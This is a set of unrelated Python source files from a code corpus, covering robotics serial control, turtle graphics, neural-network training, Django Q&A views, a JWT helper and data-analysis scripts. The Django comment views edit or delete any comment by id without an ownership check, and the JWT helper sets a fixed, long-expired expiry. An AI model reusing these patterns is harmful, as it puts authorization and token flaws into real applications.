self.arm_functions = {\n \"Base\" : {\n \"Right\" : {\n True : self.setBaseRightRotation,\n False : self.voidMethod\n },\n \"Left\" : {\n True : self.setBaseLeftRotation,\n False : self.voidMethod\n }\n },\n \"Shoulder\" : {\n \"Forward\" : {\n True : self.setShoulderForwardMovement,\n False : self.voidMethod\n },\n \"Backward\" : {\n True : self.setShoulderBackwardMovement,\n False : self.voidMethod\n }\n },\n \"Elbow\" : {\n \"Forward\" : {\n True : self.setElbowForwardMovement,\n False : self.voidMethod\n },\n \"Backward\" : {\n True : self.setElbowBackwardMovement,\n False : self.voidMethod\n }\n },\n \"Joint\" : {\n \"Forward\" : {\n True : self.setJointForwardMovement,\n False : self.voidMethod\n },\n \"Backward\" : {\n True : self.setJointBackwardMovement,\n False : 
self.voidMethod\n },\n },\n \"Wrist\" : {\n \"Right\" : {\n True : self.setWristRightRotation,\n False : self.voidMethod\n },\n \"Left\" : {\n True : self.setWristLeftRotation,\n False : self.voidMethod\n }\n },\n \"Plier\" : {\n \"Open\" : {\n True : self.setPlierOpen,\n False : self.voidMethod\n },\n \"Close\" : {\n True : self.setPLierClose,\n False : self.voidMethod\n }\n }\n }\n\n def processArmData(self, armData):\n if time.time() - self.elapsed_time < 0.025:\n return\n self.arm_functions[\"Base\"][\"Right\"][armData[\"Base\"][\"Right\"]]()\n self.arm_functions[\"Base\"][\"Left\"][armData[\"Base\"][\"Left\"]]()\n self.arm_functions[\"Shoulder\"][\"Forward\"][armData[\"Shoulder\"][\"Forward\"]]()\n self.arm_functions[\"Shoulder\"][\"Backward\"][armData[\"Shoulder\"][\"Backward\"]]()\n self.arm_functions[\"Elbow\"][\"Forward\"][armData[\"Elbow\"][\"Forward\"]]()\n self.arm_functions[\"Elbow\"][\"Backward\"][armData[\"Elbow\"][\"Backward\"]]()\n self.arm_functions[\"Joint\"][\"Forward\"][armData[\"Joint\"][\"Forward\"]]()\n self.arm_functions[\"Joint\"][\"Backward\"][armData[\"Joint\"][\"Backward\"]]()\n self.arm_functions[\"Wrist\"][\"Right\"][armData[\"Wrist\"][\"Right\"]]()\n self.arm_functions[\"Wrist\"][\"Left\"][armData[\"Wrist\"][\"Left\"]]()\n self.arm_functions[\"Plier\"][\"Open\"][armData[\"Plier\"][\"Open\"]]()\n self.arm_functions[\"Plier\"][\"Close\"][armData[\"Plier\"][\"Close\"]]()\n self.elapsed_time = time.time()\n\n def setBaseRightRotation(self):\n self.ser.write('A'.encode(\"ascii\"))\n\n def setBaseLeftRotation(self):\n self.ser.write('B'.encode(\"ascii\"))\n\n def setShoulderForwardMovement(self):\n self.ser.write('C'.encode(\"ascii\"))\n\n def setShoulderBackwardMovement(self):\n self.ser.write('D'.encode(\"ascii\"))\n\n def setElbowForwardMovement(self):\n self.ser.write('E'.encode(\"ascii\"))\n\n def setElbowBackwardMovement(self):\n self.ser.write('F'.encode(\"ascii\"))\n\n def setJointForwardMovement(self):\n self.ser.write('G'.encode(\"ascii\"))\n\n def setJointBackwardMovement(self):\n self.ser.write('H'.encode(\"ascii\"))\n\n def setWristRightRotation(self):\n self.ser.write('I'.encode(\"ascii\"))\n\n def setWristLeftRotation(self):\n self.ser.write('J'.encode(\"ascii\"))\n\n def setPlierOpen(self):\n self.ser.write('K'.encode(\"ascii\"))\n\n def setPLierClose(self):\n self.ser.write('L'.encode(\"ascii\"))\n\n def voidMethod(self):\n return\n","sub_path":"v2/Robot/Robot/Arm.py","file_name":"Arm.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"7813687","text":"import turtle\nkor = turtle.Turtle()\nplocha = turtle.Screen()\nkor.speed(0)\ndef stvorecOdStredu(s):\n kor.penup()\n kor.forward(s/2)\n kor.left(90)\n kor.pendown()\n for i in range(4):\n kor.forward(s/2)\n kor.left(90)\n kor.forward(s/2)\n kor.penup()\n kor.left(-90)\n kor.backward(s/2)\n kor.pendown()\n\ndef sach(p):\n a = 1\n for i in range(p):\n a = a*(-1)\n if(a==-1):\n farba = 'black'\n else:\n farba = 'white'\n kor.begin_fill()\n kor.fillcolor(farba)\n stvorecOdStredu(50)\n kor.end_fill()\n kor.forward(50)\nsach(8)\nplocha.mainloop()","sub_path":"sachovnica.py","file_name":"sachovnica.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204582616","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2019-20: Homework 5\n\"\"\"\n\nimport torch\nimport torch.nn as nn\n\nclass 
CNN(nn.Module):\n def __init__(self, i, f, k=5, p=1):\n super(CNN, self).__init__()\n self.input_features = i\n self.output_features = f\n self.kernel_size = k\n self.padding = p\n self.conv1d = nn.Conv1d(in_channels=self.input_features, out_channels=self.output_features, kernel_size=self.kernel_size, padding=self.padding)\n\n def forward(self, x_reshaped):\n x_conv = self.conv1d(x_reshaped)\n return x_conv\n\n# if __name__ == '__main__':\n# w_e_size = 10\n# e_char = 5\n# m_word = 12\n# model = CNN(e_char, w_e_size)\n# x_conv = torch.Tensor(16, e_char, m_word)\n# x_out = model(x_conv)\n# #\n# xx = x_out","sub_path":"Chapter10-Sequence-Modeling-Recurrent-and-Recursive Nets/CS224n/Class 5/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"309536069","text":"# full leak can be extracted with 10 GB memory\n# but you can extract a subset of leak if you have less memory\n# pypy leak.py takes 30 mins\n\nimport csv\nimport os\nimport sys\ncsv.field_size_limit(sys.maxsize)\n\nmemory = 20 # stands for 10GB, write your memory here\nlimit = 114434838 / 10 * memory \n\ntopic_set = set()\ndoc_topic_dict = {}\n# document_id,topic_id,confidence_level\n\nfor c, row in enumerate(csv.DictReader(open(\"../input_data/documents_topics.csv\"))):\n doc_id = int(row['document_id'])\n confidence_level = float(row['confidence_level'])\n if doc_id not in doc_topic_dict:\n doc_topic_dict[doc_id] = set()\n if confidence_level > 0.3:\n doc_topic_dict[doc_id].add(int(row['topic_id']))\n topic_set.add(row['topic_id'])\n \n\nleak = {}\nc = 0\nfor c,row in enumerate(csv.DictReader(open('../input_data/promoted_content.csv'))):\n if row['document_id'] != '':\n doc_id = int(row['document_id'])\n if doc_id in doc_topic_dict:\n for topic in doc_topic_dict[doc_id]:\n leak[topic] = 1\n else:\n c += 1\nprint(len(leak))\nprint(\"missing:\", c, len(doc_topic_dict))\nprint(\"topic:\", len(topic_set))\n\ncount = 0\nfilename = '../input_data/leak.csv'\n# uuid,document_id,timestamp,platform,geo_location,traffic_source\n# 1fd5f051fba643,120,31905835,1,RS,2\n# 8557aa9004be3b,120,32053104,1,VN>44,2\n# filename = '../input/page_views_sample.csv' # comment this out locally\nfor c,row in enumerate(csv.DictReader(open(filename))):\n # if count>limit:\n\t # break\n if c%1000 == 0:\n print (c,count)\n doc_id = int(row['document_id'])\n if doc_id not in doc_topic_dict:\n\t continue\n for topic_id in doc_topic_dict[doc_id]:\n if topic_id not in leak:\n continue\n if leak[topic_id] == 1:\n leak[topic_id] = set()\n lu = len(leak[topic_id])\n leak_set = set(row['uuid'].split(' '))\n leak[topic_id].update(leak_set)\n if lu != len(leak[topic_id]):\n count += len(leak_set)\n\nfo = open('../input_data/leak_topic.csv','w')\nfo.write('topic_id,uuid\\n')\nfor i in leak:\n if leak[i]!=1:\n\t tmp = list(leak[i])\n\t fo.write('%s,%s\\n'%(i,' '.join(tmp)))\n\t del tmp\nfo.close()\t","sub_path":"final/src/feature_extract/leak_topic2.py","file_name":"leak_topic2.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238028579","text":"from django.contrib.comments.views.comments import post_comment\nfrom django.contrib.comments.models import Comment\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom 
django.core.urlresolvers import reverse\nfrom django.template.context import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.comments.models import Comment\nfrom django.contrib import comments\n\nfrom models import Question, Answer\nfrom django import forms\nfrom sa_voting.views import append_vote_dict\nfrom sa_voting.vote_obj_dict import vote_for_obj_dict\n\ndef get_country_list():\n from sa_content.models import CountryDetails\n temp = CountryDetails.objects.all()\n clist = [(key.id,key.name) for key in temp]\n clist.append((-1, 'Other'), )\n return clist\n\nclass QuestionForm(forms.ModelForm):\n def __init__( self, *args, **kwargs ):\n super( forms.ModelForm, self ).__init__( *args, **kwargs )\n fields = self.fields\n for each_field in fields.keys():\n if each_field == 'title':\n self.fields[each_field].widget.attrs={'class':'textfield2', 'value':'Type your Question Title Here', 'onfocus':\"hide_msg(this.id,'Type your Question Title Here')\", 'onblur':\"show_msg(this,'Type your Question Title Here')\"}\n self.fields[each_field].label = ''\n if each_field == 'body':\n self.fields[each_field].widget.attrs={'class':'textfield', 'cols':2, 'rows':2, 'onfocus':\"hide_msg(this.id,'Type your Questions here')\", 'onblur':\"show_msg(this,'Type your Questions here')\"}\n self.fields[each_field].label = ''\n self.fields[each_field].initial = 'Type your Questions here'\n self.fields.keyOrder = ( 'title', 'body', 'content_object')\n\n content_object = forms.ChoiceField(choices=get_country_list(),required=True, label='', widget=forms.Select(attrs = {'class':'textfield1'}))\n \n class Meta:\n model = Question\n exclude = ('created', 'user', 'content_type', 'object_id', 'content_object', 'ans_count', 'posted_user')\n\nclass TextWithLength(forms.CharField):\n def __init__(self, *args, **kargs):\n kargs['widget'] = forms.Textarea(attrs={'class':'max-length-%s' % kargs['max_length']})\n super(self.__class__, self).__init__(*args, **kargs)\n \nclass AnswerForm(forms.ModelForm):\n body = TextWithLength(max_length=250)\n class Meta:\n model = Answer\n fields = ('body',)\n \ndef add_question(request, app_label, model_name, obj_id):\n form = QuestionForm(request.POST)\n\n ques_content_id = request.POST['content_object']\n if form.is_valid():\n content_type = ContentType.objects.get_by_natural_key(app_label,model_name)\n form.instance.content_type = content_type\n form.instance.user = request.user\n if int(ques_content_id) != -1:\n form.instance.object_id = ques_content_id\n form.instance.posted_user = request.user.get_full_name()\n form.save()\n ques_dict = Question.QuestionManager.get_question_list( content_type = content_type, object_id = obj_id )\n questions = vote_for_obj_dict( ques_dict, 'answers', 'Question' )\n #ques_form = QuestionForm()\n return render_to_response( 'answers/list_questions.html', locals(), context_instance = RequestContext( request ) )\n else:\n return HttpResponse(\"False\")\n \ndef view_question(request, question_id):\n question = Question.objects.get( id = question_id )\n answers = Answer.objects.filter( question__id = question_id )\n params = {'question': question,\n 'form': AnswerForm(),\n 'answers': answers\n }\n return render_to_response('answers/view_question.html', params, context_instance = RequestContext( request ))\n\ndef answer_question(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n form = AnswerForm(request.POST)\n if form.is_valid():\n if request.user.is_authenticated():\n form.instance.user 
= request.user\n form.instance.question = question\n form.instance.posted_user = request.user.get_full_name()\n# form.instance.ip = request.META['REMOTE_ADDR']\n form.save()\n return HttpResponseRedirect(reverse('view_question', args=[question_id]))\n\n return render_to_response('answers/answer_question.html', {'form': form, 'question': question},\n context_instance = RequestContext( request ))\n\n \ndef custom_post_comment( request ):\n if request.POST['edit_comment_id'] == \"\":\n post_comment( request ) #call predefined method of comment\n else:\n edit_comment_id = request.POST['edit_comment_id']\n edit_comment = request.POST['comment']\n comment_obj = Comment.objects.get( id = edit_comment_id )\n comment_obj.comment = edit_comment\n comment_obj.is_removed = False\n comment_obj.save()\n\n app, model = request.POST['content_type'].split('.')\n content_object_id = request.POST['object_pk']\n content_type = ContentType.objects.get(app_label=app, model=model)\n article_detail_dict = {'id':content_object_id}\n content_obj = content_type.get_object_for_this_type(id=content_object_id)\n return render_to_response('comments/ajax_post_delete_comment.html', locals(),\n context_instance = RequestContext( request ))\n\ndef custom_post_reply( request ):\n if request.POST['edit_reply_id'] == \"\":\n post_comment( request ) #call predefined method of comment\n else:\n edit_reply_id = request.POST['edit_reply_id']\n edit_comment = request.POST['comment']\n comment_obj = Comment.objects.get( id = edit_reply_id )\n comment_obj.comment = edit_comment\n comment_obj.is_removed = False\n comment_obj.save()\n app, model = request.POST['content_type'].split('.')\n content_object_id = request.POST['object_pk']\n content_type = ContentType.objects.get(app_label=app, model=model)\n comment_obj = Comment.objects.get( id = content_object_id, is_removed = False )\n content_obj = comment_obj.content_type.get_object_for_this_type( id = comment_obj.object_pk)\n return render_to_response('comments/ajax_post_delete_comment.html', locals(),\n context_instance = RequestContext( request ))\n\ndef delete_own_comment(request):\n obj_id, content_type,comment_id=int(request.POST['obj_id']), request.POST['content_type'],int(request.POST['comment_id'])\n comment_obj = get_object_or_404(comments.get_model(), pk=comment_id)\n comment_obj.is_removed = True\n comment_obj.save()\n app, model = content_type.split('.')\n content_type = ContentType.objects.get(app_label=app, model=model)\n\n article_detail_dict = {'id':obj_id}\n content_obj = content_type.get_object_for_this_type(id=obj_id)\n return render_to_response('comments/ajax_post_delete_comment.html', locals(),\n context_instance = RequestContext( request ))\n\ndef reply_page(request):\n comment_id = request.GET['comment_id']\n return render_to_response('comments/reply_page.html', locals(), context_instance = RequestContext( request ))","sub_path":"fghqlnoebnq/sa_answers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571004788","text":"\"\"\"Test that C++ global variables can be inspected by name and also their mangled name.\"\"\"\n\nfrom __future__ import print_function\n\n\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbutil\n\n\nclass GlobalVariablesCppTestCase(TestBase):\n\n mydir = TestBase.compute_mydir(__file__)\n\n def setUp(self):\n TestBase.setUp(self)\n self.source = 
lldb.SBFileSpec('main.cpp')\n\n @expectedFailureAll(oslist=[\"windows\"], bugnumber=\"llvm.org/pr24764\")\n def test(self):\n self.build()\n\n (target, _, _, _) = lldbutil.run_to_source_breakpoint(self, \"// Set break point at this line.\", self.source)\n \n # Check that we can access g_file_global_int by its name\n self.expect(\"target variable g_file_global_int\", VARIABLES_DISPLAYED_CORRECTLY,\n substrs=['42'])\n self.expect(\"target variable abc::g_file_global_int\", VARIABLES_DISPLAYED_CORRECTLY,\n substrs=['42'])\n self.expect(\"target variable xyz::g_file_global_int\", VARIABLES_DISPLAYED_CORRECTLY,\n error=True, substrs=['can\\'t find global variable'])\n\n # Check that we can access g_file_global_int by its mangled name\n addr = target.EvaluateExpression(\"&abc::g_file_global_int\").GetValueAsUnsigned()\n self.assertTrue(addr != 0)\n mangled = lldb.SBAddress(addr, target).GetSymbol().GetMangledName()\n self.assertTrue(mangled != None)\n gv = target.FindFirstGlobalVariable(mangled)\n self.assertTrue(gv.IsValid())\n self.assertEqual(gv.GetName(), \"abc::g_file_global_int\")\n self.assertEqual(gv.GetValueAsUnsigned(), 42)\n","sub_path":"packages/Python/lldbsuite/test/lang/cpp/global_variables/TestCPPGlobalVariables.py","file_name":"TestCPPGlobalVariables.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464062049","text":"import sys\nsys.path.append(\"..\")\nimport argparse\nfrom glob import glob\nfrom collections import OrderedDict\n\nimport pandas as pd\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn \nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.cuda.amp import autocast \nfrom tensorboardX import SummaryWriter\nimport torch.nn.functional as F\n\nimport yaml\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nimport datetime\nimport matplotlib.pyplot as plt\n\nfrom utils.utils import AverageMeter, str2bool\nfrom online_evaluation import online_evaluation\nfrom model import SpatialConfigurationNet\nfrom loss import LovaszLossSoftmax, LovaszLossHinge, dice_coeff\n\nimport os\nimport sys\nimport random\nimport numpy as np\n\nif os.path.abspath('..') not in sys.path:\n sys.path.insert(0, os.path.abspath('..'))\n\nif os.path.abspath('../..') not in sys.path:\n sys.path.insert(0, os.path.abspath('../..'))\n\nfrom utils.tools import csv_to_catalogue\nfrom DataLoader.dataloader_IVDlocation import get_loader\nfrom NetworkTrainer.network_trainer import NetworkTrainer\n\nDATEINFO = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n\nif __name__ == '__main__':\n\n # added by ChenChen Hu\n print('This script has been modified by Madmax !')\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, default=2,\n help='batch size for training (default: 2)')\n parser.add_argument('--list_GPU_ids', nargs='+', type=int, default=0,\n help='list_GPU_ids for training (default: 0)')\n parser.add_argument('--max_iter', type=int, default=50000,\n help='training iterations(default: 50000)')\n # added by Chenchen Hu\n parser.add_argument('--num_classes', type=int, default=1)\n\n parser.add_argument('--catalogue', type=int, default=0)\n parser.add_argument('--latest', type=int, default=0,\n help='load the latest model')\n parser.add_argument('--model_path', type=str, default='../../../Output/IVD_Location/latest.pkl')\n parser.add_argument('--model_type', type=str, default='SpatialConfigurationNet',\n 
help='the type of model')\n parser.add_argument('--seed', type=int, default=68,\n help='set the seed')\n\n parser.add_argument('--loss', default='LovaszLoss',\n help='loss function')\n\n parser.add_argument('--lr', '--learning_rate', default=1e-3, type=float,\n metavar='LR', help='initial learning rate')\n parser.add_argument('--momentum', default=0.9, type=float,\n help='momentum')\n parser.add_argument('--weight_decay', default=1e-4, type=float,\n help='weight decay')\n parser.add_argument('--nesterov', default=False, type=str2bool,\n help='nesterov')\n\n args = parser.parse_args()\n\n torch.manual_seed(seed=args.seed)\n random.seed(args.seed)\n np.random.seed(args.seed)\n\n # Start training\n trainer = NetworkTrainer()\n trainer.setting.project_name = 'IVD_Location'\n trainer.setting.output_dir = '../../../Output/IVD_Location'\n list_GPU_ids = args.list_GPU_ids\n csv_path = '../../Catalogue' + '/' + str(args.catalogue) + '.csv'\n catalogue = csv_to_catalogue(csv_path)\n\n # setting.network is an object\n if args.model_type == 'SpatialConfigurationNet':\n trainer.setting.network = SpatialConfigurationNet(num_labels=20)\n print('Loading SpatialConfigurationNet!')\n\n trainer.setting.max_iter = args.max_iter\n\n trainer.setting.train_loader = get_loader(\n catalogue=catalogue,\n batch_size=args.batch_size, # 2\n num_samples_per_epoch=args.batch_size * 500,\n num_works=4,\n phase='train'\n )\n\n trainer.setting.val_loader = get_loader(\n catalogue=catalogue,\n batch_size=1,\n num_samples_per_epoch=len(list(catalogue['val'].dropna())),\n num_works=4,\n phase='val'\n )\n\n trainer.setting.eps_train_loss = 0.01\n trainer.setting.lr_scheduler_update_on_iter = True\n if args.loss == 'BCEWithLogitsLoss':\n trainer.setting.loss_function = nn.BCEWithLogitsLoss()\n elif args.loss == 'MSE':\n trainer.setting.loss_function = nn.MSELoss()\n elif args.loss == 'L1smooth':\n trainer.setting.loss_function = nn.SmoothL1Loss()\n elif args.loss == 'LovaszLoss':\n if args.num_classes > 1:\n trainer.setting.loss_function = LovaszLossSoftmax()\n else:\n trainer.setting.loss_function = LovaszLossHinge()\n trainer.setting.online_evaluation_function_val = online_evaluation\n\n # optimizer\n params = filter(lambda p: p.requires_grad, trainer.setting.network.parameters())\n trainer.set_optimizer(optimizer_type='Adam',\n args={\n 'lr': 1e-3,\n 'weight_decay': 1e-4,\n 'momentum': 0.9,\n 'nesterov': False\n },\n params = params\n )\n\n trainer.set_lr_scheduler(lr_scheduler_type='cosine',\n cfgs={\n 'T_max': args.max_iter,\n 'eta_min': 1e-7,\n 'last_epoch': -1\n }\n )\n\n if not os.path.exists(trainer.setting.output_dir):\n os.mkdir(trainer.setting.output_dir)\n trainer.set_GPU_device(list_GPU_ids)\n\n # added by Chenchen Hu\n # load the latest model when the recovery is True and the model exists.\n if args.latest and os.path.exists(args.model_path):\n trainer.init_trainer(ckpt_file=args.model_path,\n list_GPU_ids=list_GPU_ids,\n only_network=False)\n\n trainer.run()\n\n trainer.print_log_to_file('# Done !\\n', 'a')","sub_path":"Src/SVVNet/Ver&IVDLocation/train_ivdLocation.py","file_name":"train_ivdLocation.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289530193","text":"import json\nimport codecs\n\ninputfile = 'Directors.txt'\ninputfile1 = 'NomsActors.txt'\n\n\nwith codecs.open(inputfile1, 'r', encoding='utf-8', errors = 'ignore') as file1:\n\tdata = [row.strip().split('\\t') for row in file1]\n\tdicc = {}\n\n\tfor 
row in data:\n\t\tkey = row[0]\n\t\tval = row[1]\n\t\tdicc[key] = val\n\nwith codecs.open(inputfile, 'r', encoding='utf-8', errors = 'ignore') as file:\n\tdata1 = [row.strip().split(' ') for row in file]\n\n\to = open('DirectorsPelis.txt', 'w')\n\tfor row in data1:\n\t\tif row[1] in dicc:\n\t\t\trow[1] = dicc[row[1]]\n\t\t\to.write(str(row))\n\t\t\to.write('\\n')\n\n\n\n\n\n\n\n\n","sub_path":"w2watch/Database/llista_Directors.py","file_name":"llista_Directors.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192763592","text":"from authlib.jose import jwt\nfrom .models import User\n\nimport os\nimport time\nimport json\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nsecret_file = os.path.join(BASE_DIR, \"secret.json\")\n\n\nwith open(secret_file) as f:\n secret = json.loads(f.read())\n\n\ndef get_secret(setting, secret=secret):\n try:\n return secret[setting]\n except:\n error_msg = \"Set key '{0}' in secret.json\".format(setting)\n raise ImproperlyConfigured(error_msg)\n\n\nSECRET_JWT = get_secret(\"SECRET_JWT\")\n\n\ndef token_generator(property, value):\n header = {\"alg\": \"HS256\", \"typ\": \"JWT\"}\n payload = {\n \"iss\": \"jellyfish\",\n \"exp\": 1500000,\n \"iat\": int(round(time.time() * 1000)),\n }\n payload[property] = value\n token = jwt.encode(header, payload, SECRET_JWT)\n return token\n\n\ndef decode_token(token):\n claims = jwt.decode(token, SECRET_JWT)\n return claims\n","sub_path":"secondhand_server/user/jwt_auth.py","file_name":"jwt_auth.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"633608078","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef add_layer(inputs,in_size,out_size,activation_function=None):\n #随机变量,形状 in_size行 out_size列的随机矩阵\n Weight=tf.Variable(tf.random_normal([in_size,out_size]))\n #1行 out_size列的0.1矩阵\n biases=tf.Variable(tf.zeros([1,out_size])+0.1)\n #尚未被激活的值\n Wx_plus_b=tf.matmul(inputs,Weight)+biases\n\n if activation_function is None:\n outputs=Wx_plus_b\n else:\n #使用传进来的激励函数\n outputs=activation_function(Wx_plus_b)\n return outputs\n\n\n#开始端-1 结束端-1 分割300个数据,1行300列\nx_data = np.linspace(-1, 1, 300, dtype=np.float32)[:, np.newaxis]\nnoise = np.random.normal(0, 0.05, x_data.shape).astype(np.float32)\n#平方-0.5加上噪声,y_data为一行300列的随机值\ny_data = np.square(x_data) - 0.5 + noise\n\n#利用占位符定义我们所需的神经网络的输入。 tf.placeholder()就是代表占位符,\n# 这里的None代表无论输入有多少都可以,因为输入只有一个特征,所以这里是1\nxs = tf.placeholder(tf.float32, [None, 1])\nys = tf.placeholder(tf.float32, [None, 1])\n\n#定义隐藏层,使用 Tensorflow 自带的激励函数tf.nn.relu\nlay = add_layer(xs, 1, 10, activation_function=tf.nn.relu)#输入1列输出10列\n#定义输出层,结果\nprediction = add_layer(lay, 10, 1, activation_function=None)#输入10列输出1列\n\n#计算预测值prediction和真实值的误差,对二者差的平方求和再取平均。\nloss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction),reduction_indices=[1]))\n\n#tf.train.GradientDescentOptimizer()中的值通常都小于1。\n# 这里取的是0.1,代表以0.1的效率来最小化误差loss\ntrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)#梯度优化\n\n#变量初始化\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n#训练1000次\n#机器学习的内容是train_step, 用 Session 来 run 每一次 training 的数据,逐步提升神经网络的预测准确性。\nfor i in range(1000):\n # training\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n #每50步我们输出一下机器学习的误差。\n if i % 50 == 0:\n # to 
see the step improvement\n print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))\n\n# plot the real data\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nax.scatter(x_data, y_data)\nplt.ion()#本次运行请注释,全局运行不要注释\n#每隔50次训练刷新一次图形,用红色、宽度为5的线来显示我们的预测数据和输入之间的关系,并暂停0.1s。\nfor i in range(1000):\n # training\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n if i % 50 == 0:\n # to visualize the result and improvement\n try:\n ax.lines.remove(lines[0])\n except Exception:\n pass\n prediction_value = sess.run(prediction, feed_dict={xs: x_data})\n # plot the prediction\n lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n plt.pause(0.1)\n\nplt.show()","sub_path":"beginLearn/tensorfw2/tensorfw_activation.py","file_name":"tensorfw_activation.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167745135","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'website'\nurlpatterns = {\n path('', views.index, name='index'),\n path('country/', views.list_country, name='country'),\n path('sunshine/', views.list_sunshine, name='sunshine'),\n path('spring-city/', views.list_spring, name='spring-city'),\n}\n","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"419904442","text":"import glob\nimport os\n\nimport numpy as np\nimport pandas as pd\nfrom statsmodels.stats import multitest\nfrom utils import load_pickle\n\nif __name__ == \"__main__\":\n subjects = sorted(\n glob.glob(\n '/scratch/gpfs/hgazula/podcast-encoding/results/no-shuffle/*'))\n\n hemisphere_indicator = load_pickle(\n '/scratch/gpfs/hgazula/podcast_hemisphere_indicator.pkl')\n\n lags = np.arange(-2000, 2001, 25)\n\n pval_dict = dict()\n some_list = []\n for subject in subjects:\n subject_key = os.path.basename(subject)\n\n shuffle_elec_file_list = sorted(\n glob.glob(\n os.path.join(\n '/scratch/gpfs/hgazula/podcast-encoding/results/phase-shuffle',\n os.path.basename(subject), '*.csv')))\n\n main_elec_file_list = sorted(\n glob.glob(\n os.path.join(\n '/scratch/gpfs/hgazula/podcast-encoding/results/no-shuffle',\n os.path.basename(subject), '*.csv')))\n\n # curr_key = hemisphere_indicator.get(int(subject_key), None)\n\n # if not curr_key:\n # pass\n # elif len(curr_key) == 2:\n # shuffle_elec_file_list = list(\n # filter(lambda x: os.path.basename(x).startswith(('L', 'DL')),\n # shuffle_elec_file_list))\n # main_elec_file_list = list(\n # filter(lambda x: os.path.basename(x).startswith(('L', 'DL')),\n # main_elec_file_list))\n # elif len(curr_key) == 1 and 'RH' in curr_key:\n # continue\n # else:\n # pass\n\n a = [os.path.basename(item) for item in shuffle_elec_file_list]\n b = [os.path.basename(item) for item in main_elec_file_list]\n\n assert set(a) == set(b), \"Mismatch: Electrode Set\"\n\n for elec_file1, elec_file2 in zip(shuffle_elec_file_list,\n main_elec_file_list):\n elecname1 = os.path.split(os.path.splitext(elec_file1)[0])[1]\n elecname2 = os.path.split(os.path.splitext(elec_file2)[0])[1]\n\n assert elecname1 == elecname2, 'Mismatch: Electrode Name'\n\n if elecname1.startswith(('SG', 'ECGEKG', 'EEGSG')):\n continue\n\n perm_result = pd.read_csv(elec_file1, header=None).values\n rc_result = pd.read_csv(elec_file2, header=None).values\n\n assert perm_result.shape[1] == rc_result.shape[\n 1], \"Mismatch: Number of Lags\"\n\n if perm_result.shape[1] != len(lags):\n 
print('perm is wrong length')\n        else:\n            omaxs = np.max(perm_result, axis=1)\n\n            s = 1 - (sum(np.max(rc_result) > omaxs) / perm_result.shape[0])\n            some_list.append((subject_key, elecname1, s))\n\n    df = pd.DataFrame(some_list, columns=['subject', 'electrode', 'score'])\n    thresh = 0.01\n\n    # df1 = df.copy(deep=True)\n    # flag = np.logical_or(np.isclose(df1.score.values, thresh, atol=1e-6), df1.score.values > thresh)\n\n    # df1 = df1[flag]\n    # df1['electrode'] = df1['electrode'].str.strip('_comp')\n    # df1.to_csv('pre_fdr.csv',\n    #            index=False,\n    #            columns=['subject', 'electrode'])\n\n    _, pcor, _, _ = multitest.multipletests(df.score.values,\n                                            method='fdr_bh',\n                                            is_sorted=False)\n\n    flag = np.logical_or(np.isclose(pcor, thresh), pcor < thresh)\n\n    df = df[flag]\n    df['electrode'] = df['electrode'].str.strip('_comp')\n    df.to_csv('post_fdr.csv', index=False, columns=['subject', 'electrode'])\n\n    filter_hemisphere = []\n    for row in df.itertuples(index=False):\n        subject = row.subject\n        electrode = row.electrode\n\n        curr_key = hemisphere_indicator.get(int(subject), None)\n\n        if not curr_key:\n            if int(subject) == 798:\n                filter_hemisphere.append((subject, electrode))\n        elif len(curr_key) == 2:\n            if electrode.startswith(('L', 'DL')):\n                filter_hemisphere.append((subject, electrode))\n        elif len(curr_key) == 1 and 'RH' in curr_key:\n            continue\n        else:\n            filter_hemisphere.append((subject, electrode))\n\n    df2 = 